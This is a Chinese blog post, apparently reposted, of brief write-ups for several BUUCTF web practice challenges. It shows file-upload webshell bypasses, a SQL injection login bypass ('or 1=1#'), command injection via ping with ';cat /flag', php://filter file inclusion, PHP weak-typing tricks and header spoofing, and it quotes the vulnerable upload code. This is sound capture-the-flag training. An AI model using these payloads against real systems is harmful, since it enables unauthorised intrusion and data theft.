ctf赛题secret.php,BUUCTF web 刷几道菜鸡能做的题

最新推荐文章于 2023-03-13 20:48:14 发布
最新推荐文章于 2023-03-13 20:48:14 发布
阅读量622 收藏 1
点赞数
文章标签: ctf赛题secret.php

[WUSTCTF2020]CV Maker(文件上传)

1、注册,登录,上传图片马,用bp抓包后将filename后缀改为php,连上蚁剑。

[极客大挑战 2019]Havefun(简朴代码审计)

[极客大挑战 2019]Knife

1、直接连上蚁剑。果真白给的shell。

[极客大挑战 2019]EasySQL(万能密码)

username=’admin’or 1=1#’ and password=’随便写’

用户名:’or 1=1#

密码 : 随便输

[ACTF2020 新生赛]BackupFile(备份文件泄露&php弱类型)

1、用wsacn扫出备份文件index.php.bak

10ac6009cc4723a998964410847912f2.png

2、

include_once "flag.php";

if(isset($_GET['key'])) {

$key = $_GET['key'];

if(!is_numeric($key)) {//若是$key不是数字,输出Just num!

exit("Just num!");

}

$key = intval($key);

$str = "123ffwsfwefwf24r2f32ir23jrw923rskfjwtsw54w3";

if($key == $str) {

echo $flag;

}

}

else {

echo "Try to find out source file!";

}

要求$key是数字,且弱即是123ffwsfwefwf24r2f32ir23jrw923rskfjwtsw54w3

测试:

UbAVzm.png@thumb

以是,string在和int弱对照时,string会强制转换为int,删掉第一个字符及其后面的所有内容,只保留最前面的数字。

key=123就可。

[ACTF2020 新生赛]Upload(文件上传-前端js验证&黑名单绕过)

1、F12,删除οnsubmit=”return checkFile()”,绕过前端验证

2、发现不能上传php,就是可能后端黑名单过滤了php

上传一句话木马,用burpsuite抓包,修改filename的后缀为.phtml,连上蚁剑。

最后,放上源码:

error_reporting(0);

//设置上传目录

define("UPLOAD_PATH", "./uplo4d");

$msg = "Upload Success!";

if (isset($_POST['submit'])) {

$temp_file = $_FILES['upload_file']['tmp_name'];

$file_name = $_FILES['upload_file']['name'];

$ext = pathinfo($file_name,PATHINFO_EXTENSION);

if(in_array($ext, ['php', 'php3', 'php4', 'php5'])) {

exit('nonono~ Bad file!');

}

$new_file_name = md5($file_name).".".$ext;

$img_path = UPLOAD_PATH . '/' . $new_file_name;

if (move_uploaded_file($temp_file, $img_path)){

$is_upload = true;

} else {

$msg = 'Upload Failed!';

}

echo '

'.$msg." Look here~ ".$img_path."
";

}

?>

[ACTF2020 新生赛]Exec(下令执行)

1、先ping 127.0.0.1,能ping通

2、ping 127.0.0.1;cat /flag和127.0.0.1 & cat /flag都可以

然则不知道ping 127.0.0.1 && cat /flag就不行

[ACTF2020 新生赛]Include(文件包罗)

b963e3a7e47b8c79c1b510287aa97a6e.png

1、直接?file=php://filter/read=convert.base64-encode/resource=flag.php

[极客大挑战 2019]Http

1、Ctrl+U查看源码,发现了Secret.php

02b55e5a8371fd210f028146cb5d8d72.png

2、

66a9b0eb2bad5c84afeb9fd878604feb.png

提醒了接见的网址,用burpsuite添加Referer头

3、

0690af64c2c7a2036dd35fa554fa5a5b.png

要求使用Syclover浏览器,再添加User-Agent

4、

1cf5c691b16decf81ab4fb0d93698819.png

只能内陆接见,添加X-Forwarded-For

[极客大挑战 2019]BuyFlag

打开menu下的payflag后,发现一些hint

bde53192a5cc6e7c998c0b3bf916b549.png

1、要100000000 money

2、必须是成新的student

3、correct password

在源码最后的一段发现有用的注释

3ef87de174f2f826ea48d178548c7e74.png

1、要post提交money和password,money用科学计数法

2、password要弱即是404,还不能是数字,就行使php弱类型

money=1e10&password=404a

没啥啊。。。

用burpsuite抓包

210c2f19eaf36f121e99f3561a7cbb2f.png

发现user值为0,武断改为1,嘿嘿嘿

原文链接:https://www.cnblogs.com/wrnan/p/12720927.html

本站声明:网站内容来源于网络,若有侵权,请联系我们,我们将及时处理。

小杨叔聊生化环材
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
ctf赛题secret.php,记一场纯JS赛——DiceCTF2021 Web
weixin_42509398的博客
03-12 754
// remake the `users` tabledb.exec( `DROP TABLE IF EXISTS users;`);db.exec( `CREATE TABLE users(id INTEGER PRIMARY KEY AUTOINCREMENT,username TEXT,password TEXT);`);// add an admin user with a random ...
ctf赛题secret.php,CTF赛题全解之CTF成长之路(三)
weixin_39594312的博客
03-12 749
1.目名称:BuyFlag打开页面发现有个payflag的页面点进去查看源代码发现注释中有代码判断password参数是否是404,这里利用了is_numeric函数来进行判断所以提交404%20即可绕过is_numeric的判断。又要求必须是学生才行,这里看到cookie的user字段。这里我们改为1再进行提交。通过判断一开始在源代码中的代码,我们添加money参数,将参数设置为flag的价格...
CTF-Pwn-[BJDCTF 2nd]secret
归子莫的博客
05-06 1481
CTF-Pwn-[BJDCTF 2nd]secret 博客说明 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! CTP平台 网址 https://buuoj.cn/challenges 目 Pwn类,[BJDCTF 2nd]secret 下载目文件 secret 思路 老规矩使用file...
CTF训练(PWN)——format_secret
weixin_49270591的博客
04-12 439
CTF训练(PWN)——format_secret 这次拿到的是一道pwn,作为新手只能慢慢学习(啊啊啊啊,pwn是真的难~~) 读 根据描述,知道是格式化字符串漏洞,于是去度娘了解一下格式化字符串漏洞是什么??? 这里附上来自同站大佬的链接:https://blog.csdn.net/qq_43394612/article/details/84900668 分析目 首先下载附件 拿到一个意义不明的白色文件 解 首先使用checksec进行查看 没有的话可以使用git进行安装 git clone
web | CTF】极客大挑战 2019 Secret File
weixin_46301214的博客
05-27 1163
要点 【解思路】 目录扫描+检查源码 ->发现了一个隐藏目录 根据文字提示,觉察到有隐藏暗跳 找到暗链后访问就能看到解源码 直接利用文件访问漏洞读取php文件源码即可 【难点】 通过目语言暗示觉察出暗中跳转 【漏洞点】 源码泄露 文件包含漏洞 步骤一:发现隐藏目录 查看源码发现了隐藏的目录文件 ctrl+点击,跳转速达 步骤二:发现隐藏文件跳转网址 SECRET可以点击,那我们就点一下看看吧...
整理自己过的关于RealWorld的CTF赛题.zip
最新发布
10-25
整理自己过的关于RealWorld的CTF赛题
CTF100.docx
05-25
CTF是一种流行的信息安全竞赛形式,其英文名可直译为“夺得Flag”,也可意译为“夺旗赛”。其大致流程是,参赛团队之间通过进行攻防对抗、程序分析等形式,率先从主办方给出的比赛环境中得到一串具有一定格式的字符...
2021 N1CTF CTF.zip
12-07
2021 N1CTF CTF
CTF信息安全比赛单项选择.docx
01-25
CTF信息安全比赛单项选择.
CTF-隐写术(八)
→_→
09-21 2552
声明:以下CTF均来自网上收集,在这里主要是给新手们涨涨见识,仅供参考而已。需要目数据包的请私信或在下方留言。 15.复杂的QR_code(来源:实验吧) 1.关卡描述 2.解步骤 分析: 1.下载图片,发现是一个二维码,尝试扫描,看到“secret is here” 2.既然是一个隐写的,选择binwalk 处理一下这个图片 发现里面是一个zip文件 或者用winhex打开: ...
ctf--PHP大法(web
qq_36791003的博客
08-17 8890
目 注意备份文件 解链接: http://ctf5.shiyanbar.com/DUTCTF/index.php 打开链接 网址后修改为index.php.txt 由GET[id]=urldecode(GET[id]=urldecode(_GET[id]=urldecode(_GET[id])可以知道当以GET方式提交后,该函数对id进行了url编码。 url编码表 尝试...
BugkuCTF-WEB源码
am_03的博客
08-26 273
根据提示 查看源码 有URL编码 解码并将其拼接 有一个假flag提交 得到真flag
buuctf-Secret File(涉及文件包含)
m0_62094846的博客
10-27 195
打开网页后出现这样的页面,没有可以点击的地方,也没出现什么有用的信息,查看源代码 也没看到什么有用的信息,但出现了一个可以点击的代码,点击一下,进入这样的界面 又出现一个按钮,点击后却说查阅结束,要我们回去看看 查看后有个有意思的发现 源页面中的代码是action.php 但是点开后的页面却是end.php 所以可以判断两个页面之间还有一个页面,但是无论怎么输入action.php,页面都会跳转到end.php,可能是页面转的太快,试试抓包让它停下来 抓包...
buuctf——SecretFile
qq_51796436的博客
03-05 933
进来就看见有大佬被挂在黑页 F12查看源码看到在下面有个黑化了的标签藏得挺深,./Archive_room.php。然后网页中间有个 不知道的还以为在FBI warning.点进去看看,注意到直接来到了end.php,但是在上一页的源码这个secret的herf是跳转至action.php啊。应该是action.php302跳转到了end.php吧,开burp看看 事实证明确实有action.php repeater发包后在响应包看到有secr3t.php,拿到目源码: <html>
CTF网络安全竞赛签到
weixin_44233476的博客
08-19 5197
CTF签到 F_签到 是一张file3.jpg图片 解方法: 1.打开kali虚拟机,用binwalk -e file3.jpg得到txt文件 2.打开flag3.txt,是:ZmxhZ3t1dTRzY250cHV3Mjl9,联想到base64 3.用网站https://base64.supfree.net/进行base64解密即可得到flag{uu4scntpuw29} ...
[极客大挑战 2019]Secret File
kuller_Yan的博客
05-30 365
[极客大挑战 2019]Secret File wp from Kuller_Yan 打开靶机 成功开启”大黑贼时代",查看源代码发现php,直接点击跳转 发现一个“secret”按钮,点击告诉我们已经出现了,我们没看到,那么就自然抓包,在burp看,发现secr3t.php 访问发现一段php代码并且告诉我们flag在flag.php,进行代码审计发现可以直接使用file伪协议,然后得到一段base64编码,解码就是flag。 http://68049c7d-101d-46bc-8cb7-615551
BUUCTFWeb目 WriteUp
Luminous_song的博客
03-12 5809
Web
WEB 渗透(二)
0xac001d09
12-09 1616
[ACTF2020 新生赛]Upload–上传 验证了后缀名,要求上传 jpg、png、gif 结尾的图片,写一句话木马上传,一开始只能是图片的后缀,抓包改后缀为 phtml,文件内容如下 GFI89a <script language="php">eval($_POST['hello']) </script> 上传成功,显示 Upload Success! Look here~ ./uplo4d/fc7cad21c9c68a7847837cf3c194f78d.phtml 直接
NSSCTF记录
kindyyy的博客
03-13 786
NSSctf记录,有错误欢迎指正
网络功防大赛ctf赛题
07-24
网络攻防大赛CTF赛题是一种网络安全竞赛模式,目的是锻炼参赛者在信息安全技术上的实战能力。CTF即Capture The Flag,中文就是抓住旗帜的意思。 CTF赛题通常包含各种各样的安全问,例如密码学、网络安全、移动安全、二进制漏洞等等。参赛者需要根据提供的资源和条件,找出解决问的方法,并尽快找到旗帜(Flag)。 旗帜是赛题的关键,它们通常是一串特定格式的字符串,如"flag{...}"。找到旗帜意味着成功攻破了这个赛题。然而,攻破赛题并不仅仅意味着获得旗帜,还需要通过各种技术手段保护自己的系统,防止其他参赛者攻击。 CTF赛题的设计通常非常有挑战性,旨在考验参赛者的技术实力和解决问的能力。参赛者需要具备扎实的计算机基础知识,对各种漏洞和攻击手段有一定的了解,同时能够分析和解决问CTF赛题的丰富多样性也吸引了众多安全爱好者的参与。通过参与这样的赛事,他们能够不断学习新的知识和技术,提升自己在信息安全领域的竞争力。 总之,网络攻防大赛CTF赛题是一种刺激有趣的竞赛形式,在提高参赛者的安全技术能力的同时,也为信息安全领域的发展出了贡献。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值